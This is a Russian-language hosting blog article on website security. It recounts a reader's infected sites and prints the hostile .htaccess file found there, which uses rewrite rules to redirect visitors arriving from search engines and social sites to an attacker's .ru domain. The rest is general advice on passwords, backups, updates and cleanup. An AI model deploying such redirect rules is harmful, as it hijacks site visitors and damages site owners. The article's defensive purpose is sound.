Безопасность хостинга

Автор Cherrygarden, дата публикации 19.10.2012 |

Сегодня еще есть люди, которые относятся к всемирной сети Интернет, как к всеобъемлющей энциклопедии мира. Однако таких людей становится все меньше. И все больше тех, кто по праву считает интернет средством заработка денег. Ведь он может привлечь большое количество новых клиентов вашему бизнесу, оповестить всех и вся о том, что вы есть, и какие неоценимые услуги вы оказываете за сущие копейки. Мало того, интернет может приносить вам деньги даже тогда, когда у вас нет никакого бизнеса в офлайне. Вы можете зарабатывать прямо в интернете.

Все, что вам нужно, иметь свой сайт или несколько сайтов (по вашему желанию). Ну и конечно, вам не обойтись без покупки хостинга. Выбор хостинга - путь сложный и тернистый. Чтобы пройти его без потерь вам нужно многое узнать, прочитать с десяток полезных статей.

Допустим, этот путь вы преодолели, успешно пользуетесь хостинг услугами и вот настал момент, когда вы пожинаете плоды своей деятельности и зарабатываете деньги. И тут, как гром среди ясного неба, в один прекрасный день вы обнаруживаете, что ваш сайт подвергся атаке. И в худшем случае, весь ваш бизнес безвозвратно потерян. А все почему? Потому, что при выборе хостинга, вы обошли стороной такой важный и судьбоносный параметр, как безопасность хостинга. А это значит, что ваш хостинг провайдер, которому вы наивно доверили все, что у вас было, не смог защитить и сохранить это.

!Внимание. В первую очередь вы отвечаете за безопасность, как вы храните пароли, с каких компьютеров заходите и т.д. И уже потом стоит хостинг-провайдер.

Приобретая хостинг со слабой системой защиты данных, вы приобретаете шикарные апартаменты с большой железной дверью, в которой нет замка. Ну а если вы еще и дверь не закрываете, то ждите гостей...

История из жизни

Вы, наверно, знаете, что я собираю отзывы об американском хостинге и в начале октября мне пришел отзыв о хостинг-провайдере iPage

Ужасный хостинг, у меня уже второй месяц заражаются все сайты вирусом. В поддержке опять заладили все обновите и поменяйте пароли. Я уже все 2 раза обновляла , поменяла все пароли. Скачивала себе бекапы и проверяла на вирусы. Удаляла все подчистую на сервере и заливала чистые только скачанные с сайтов производителей CMS. И второй раз то же самое. Техподдержка только и говорит одно и то же. Но никакого изменения. Никому его не советую. Только купила еще 2 месяца прошло но сайты нормально только несколько дней поработали. У меня еще 2 хостинга с 2000 года ни одного другого сайта не заразили, и эти же сайты пока были в другом месте не разу не ломали и не заражали
Любовь http://hleb.org.ua/

Заражение вирусом проявлялось так:  если с главной страницы перейти на любую другую - происходила переадресация на совершенно другой сайт, переадресацию блокировал хостинг-провайдер. Конечно, результат для хозяина зараженного ресурса плачевный - падает трафик из поисковых машин и заработок с сайта стремится к нулю.

К слову, у меня у самого есть несколько блогов на iPage и я сразу же их проверил. Подобных проблем не обнаружилось, поэтому я пришел к выводу, что это не массовое заражение. И попросил владелицу выслать мне архив темы и файл .htaccess (это специальный файл, который отвечает за конфигурацию веб сервера и позволяет запретить или разрешить доступ к определенной папке и сделать переадресацию )

Вот привожу код файла .htaccess, который мне выслала Любовь

<IfModule mod_rewrite.c>                                                                                                                        
RewriteEngine On                                                                                                                        
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace)\.(.*)                                                                                                                        
RewriteRule ^(.*)$ http://subsequentcompare.ru/Priority?8 [R=301,L]                                                                                                                        
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)                                                                                                                        
RewriteRule ^(.*)$ http://subsequentcompare.ru/Priority?8 [R=301,L]                                                                                                                        
</IfModule>

Здесь на лицо автоматическая переадресация на сайт хакера (Любовь подтвердила, что это не ее ресур) с соблюдением следующих условий, если на взломанный сайт перешли из google, ask, yahoo и т.д ... достаточно внушительный список, причем подозрительно, что в нем нет yandex, а переадресация идет на сайт в зоне .ru. Похоже злоумышленник взял инструкцию в западном интернете и сам над ней не работал.

История эта закончилась хорошо, пришлось все почистить и поменять пароли. Из дальнейшей переписки Любовь мне сообщила, что взломали через один из сайтов на Joomla, через com_extplorer.

Почему же хакеры взламывают сайты, зачем им это надо?

Основные причины взлома сайтов

Систематизировать на категории все причины взлома сайта сложно. Но я постараюсь. Итак, я думаю, вы уже догадались о главной причине, по которой совершались и совершаются все самые отъявленные преступления – это деньги!

1. Деньги

Заработать шальные, легкие деньги на вашем сайте можно несколькими способами:

  • Использовать ваш сайт для собственной рассылки и спама
  • Использовать ваш сайт, чтобы сливать трафик и продавать его
  • Получить все права на ваш сайт и продать его
  • Разместить на вашем сайте скрытые ссылки и вредоносные программы
  • С помощью специального кода перенаправить ваших посетителей (клиентов) на свой сайт

2. Конкуренция

Как и в реальной жизни, в жизни виртуальной происходит все та же борьба за место под солнцем. Конкуренция в сети очень развита и каждый бизнесмен всегда отслеживает, как продвигаются дела у его коллег с той целью, чтобы не отставать и даже быть на голову выше. Но как это всегда бывает, не всякая конкуренция бывает честной. Иногда фирма «заказывает» конкурента хакерам и добивается того, чтобы свои продажи резко выросли.

3. Интерес

Чуть ли не добрая половина злодеяний в сети происходит из-за обычного хулиганства. Причиной этому может быть обычное тщеславие (человек гордится тем, что он смог это сделать). Или же, кого-то может интересовать код программы либо какой-то пароль, который находится на вашем сайте. То есть ваш сайт просто инструмент достижения личной цели.

4. Ошибочно

Случается и такое, что по ошибке вашей или провайдера, посетитель может взломать ваш сайт нечаянно.

Способы атаки

Существует огромное множество способов атаки вашего сайта. Не буду вдаваться в подробности, но обозначить основные из них просто обязан.

Увод пароля - злоумышленник заражает ваш компьютер и вредоносная программа копирует пароли из браузера или ftp-клиента и отсылает на электронную почту хакера. Таким образом в базу злодея могут попасть все ваши сохраненные в браузере пароли и поэтому вы можете потерять не только свои сайты, но и добротную часть вашей информации, которая хранится в интернет.

DDoS – атака приводит сервер в полное бездействие. Суть такой атаки в том, что на ваш сервер в одну секунду совершается огромное количество обращений. Совершается это с многих компьютеров, которые по большей части своей заражены различными вирусами. Если вы плохо защищаете свой компьютер, то тоже можете стать инструментом DDoS атаки. Такая атака пусть и не продолжительная, но действенная. И если у вас крупный бизнес, то даже один день простоя вашего сервера может сильно сказаться на вашей прибыли.

Вредоносные ссылки и программы – это скрытые ссылки и коды программ, которые приводят к плачевным последствиям. А именно, ваш сайт может быть заблокирован хостинг-провайдером за нарушения правил, вы можете быть выкинуты из всех поисковых программ, получить негативные отзывы на различных форумах и сайтах. Вы этого можете даже не знать. А вскоре обнаружите, что все ниже и ниже посещаемость, все меньше совершается сделок на сайте, или вам вовсе отказано в хостинг услугах. Подобное как раз произошло с героиней нашей статьи.

XSS – атака проводится злоумышленниками незаметно для сайта и не принося никаких видимых проблем. Это на первый взгляд. А на самом деле с помощью специального скрипта вредитель проникает в память вашего сайта и ворует ссылки и получает доступ к  аккаунтам пользователей. С помощью изменения кода страницы вашего сайта хакер может перенаправить ваших посетителей на свой сайт.

SQL-инъекция – способ атаки, при котором взломщик получает возможность чтения или записи данных, а также выполнять любые команды на сервере. Атака работает путем внедрения в SQL-запрос произвольного SQL-кода. Очень опасная и фатальная атака сайта, при которой вы можете потерять все свои данные.

На самом деле видов и подвидов атак очень много и знать их все вам ни к чему. Важнее для вас это знать то, каким образом их избежать и от них защититься. Но обо все по порядку.

Слабые места вашего сайта

Пароль – очень многие начинающие веб-мастера не придают этому большого значении и оказывается, что зря. У всех хакеров есть статистические данные о часто используемых паролях, и они этими данными успешно пользуются. И не считайте себя слишком уж оригинальным, если вводите в пароль дату своего рождения или тому подобные данные. Для того, чтобы не морочить себе голову и каждый раз придумывать оригинальный и сложный пароль, пользуйтесь благами цивилизации – скачайте себе генератор паролей типа «KeePass». Да и не вздумайте использовать один и тот же пароль дважды, или трижды. Не облегчайте работу хакерам.

Скрипты – являются еще одной слабой стороной вашего сайта. Очень многие скрипты имеют дыры и лазейки для хакеров, с помощью которых они могут беспрепятственно проникнуть в код вашего сайта и завладеть необходимой информацией.

Аккаунаты сайта, которые вы создаете с целью тестирования работы ресурса или для каких-либо других целей. Часто про них просто забывают, вместо того, чтобы удалять. А такие акаунты – лакомый кусочек для хакеров, так как вы вряд ли умудрились создать для него более менее приличный пароль.

Как обезопасить себя

1. Используйте надежную систему хранения паролей

2. Обновляйте программное обеспечение на компьютере и сервере

3. Пользуйтесь только проверенными скриптами (движками)

4. Сканируйте сайт на уязвимость (в этом вам помогут специальные программы-сканеры)

5. Пользуйтесь услугами надежного и качественного хостинга

6. Положите  в папки с изображениями и javascript пустые файлы index.php

7. Постоянно делайте бекап файлов и базы данных сайта.

8. Положите в административную папку вашего сайта файл .htaccess, в котором пропишите разрешение на доступ только с вашего IP

9. Регулярно сканируйте ваш компьютер на вирусы и трояны, угроза может прийти и отсюда.

10. Старайтесь не заходить в админку вашего сайта с непроверенных компьютеров и забудьте об интернет-кафе (чаще всего там на клавиатуры устанавливают считыватели паролей)

На что обратить внимание при покупке хостинга

Для того, чтобы обезопасить ваш сайт со стороны сервера, на котором он будет располагаться, необходимо выбрать безопасный хостинг. Если со своей стороны вы проводите все профилактические меры, чтобы обезопасить свой сайт от взлома, то со стороны сервера вы должны будете полностью довериться вашему провайдеру. Конечно, можно поверить ему на слово. Но мы люди практичные и недоверчивые, поэтому подбираем хостинг, по следующим параметрам безопасности:

1. Размещайте свой сайт только на сервере с достаточным количеством ресурсов. Если пропускные способности вашего сервера ограничены, то возможно он не выдержит DDoS атаки. Лучше, если вы будете иметь независимый канал к серверу, через который можно будет получить доступ к своему ресурсу. То есть выбираем провайдера с возможностью предоставления неограниченного трафика. Конечно, он ограничен, но это значит, что он большой.

2. Выбирайте провайдера, который гарантирует вам регулярный BackUp, то есть резервное копирование всех ваших данных, которые очень смогут вам пригодиться в случае чего.

3. Выбирайте провайдера, который работает только на платформе современного программного обеспечения, обновленного до последней его версии.

4. Хостинг-провайдер должен поддерживать работу самых последних версий скриптов и приложений.

5. Убедитесь, что провайдер работает только с проверенными движками и скриптами и не разрешает всем пользователям загружать неизвестные программы на сервер. В противном случае, из-за некомпетентности одно из пользователей сервера, пострадать можете вы.

6. Лучше, если провайдер поддерживает защищенное соединение с вашим аккаунтом - SFTP или SSH, благодаря которым у вас не украдут пароли во время передачи файлов через ftp-клиент.

Что делать, если вас взломали?

1. Не паниковать.

2. Проверьте файлы index.php (index.html, index.htm, defolt.html и подобные, к которым в первую очередь обращается браузер) и .htaccess в текстовом редакторе.  Если вы обнаружили в них подозрительный код, то просто замените их на дефолтные (которые идут по умолчанию с движком). Чаще всего проблема решается на этом шаге.

3. Если предыдущий вариант вам не помог, то разворачивайте бекап.

4. Обязательно отложите последний "незараженный" бекап в отдельную папку.

5. Обновляйте все плагины, модули, движки, если не обновлены.

6. Меняйте все пароли.

7. Удалите и больше не сохраняйте пароли в браузере, особенно доступы к вашим сайтам и кошелькам. Вместо ftp-клиента пользуйтесь программами наподобие WinSCP, которые не сохраняют пароли и могут создавать зашифрованные соединения.

8. Обновите антивирус или базу вирусов на вашем компьютере.

9. Если проблема повторилась через некоторое время, обратитесь за помощью к профессионалам.

10. Если профессионал говорит, что дело в хостинге, то смело меняйте провайдера.

11. Если же вас взломали и после смены провайдера, то дело точно в вас.

Выбор безопасного хостинга сродни выбору спутника жизни: приглядываешься к нему, проверяешь на вшивость, узнаешь родословную и тому подобное. И только после этого принимаешь решение. Для того, чтобы ваш «союз» с провайдером был долговечен, и в горе и в радости, и в болезни и в здравии, пока смерть не разлучит вас, выбирайте только безопасный хостинг. Иначе все может уже закончиться в стадии помолвки.

На закуску видео про любовь кота к Toyota Corolla.

Популярные обзоры хостинга

Если Вы ищете хостинг для своего сайта, то перед Вами популярные обзоры американского хостинга.

HostGator хостинг Bluehost хостинг Fatcow хостинг Webhostingpad хостинг iPage хостинг

Поделитесь статьей с друзьями или сохраните в закладки

twitter.com facebook.com vkontakte.ru odnoklassniki.ru mail.ru ya.ru blogger.com liveinternet.ru livejournal.ru memori.ru google.com bobrdobr.ru mister-wong.ru yandex.ru